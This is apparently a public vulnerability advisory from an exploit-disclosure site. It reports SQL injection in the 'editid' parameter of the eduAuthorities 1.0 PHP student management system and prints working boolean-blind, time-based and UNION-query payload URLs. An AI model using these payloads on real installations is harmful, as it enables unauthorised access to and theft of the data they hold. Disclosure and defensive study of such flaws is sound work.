eduAuthorities-1.0 Multiple-SQLi

2024.08.06
bg nu11secur1ty (BG) bg
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Titles: eduAuthorities-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 07/29/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The editid parameter appears to be vulnerable to SQL injection attacks. The payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each submitted in the editid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Additionally, the payload (select*from(select(sleep(20)))a) was submitted in the editid parameter. The application took 20011 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Exploits: - SQLi Multiple: ```mysql --- Parameter: #1* (URI) Type: boolean-based blind Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488 OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)# UiVZfrom(select(sleep(3)))a) Type: UNION query Title: MySQL UNION query (random number) - 3 columns Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962 UNION ALL SELECT 8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a) --- ``` ## Reproduce: [href](https://www.patreon.com/posts/eduauthorities-1-109562178) ## More: [href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html) ## Time spent: 00:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top